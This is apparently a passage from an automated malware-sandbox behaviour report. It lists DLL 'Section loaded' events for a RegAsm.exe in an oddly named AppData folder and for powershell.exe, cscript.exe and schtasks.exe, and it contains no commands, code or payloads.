Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: vbscript.dll
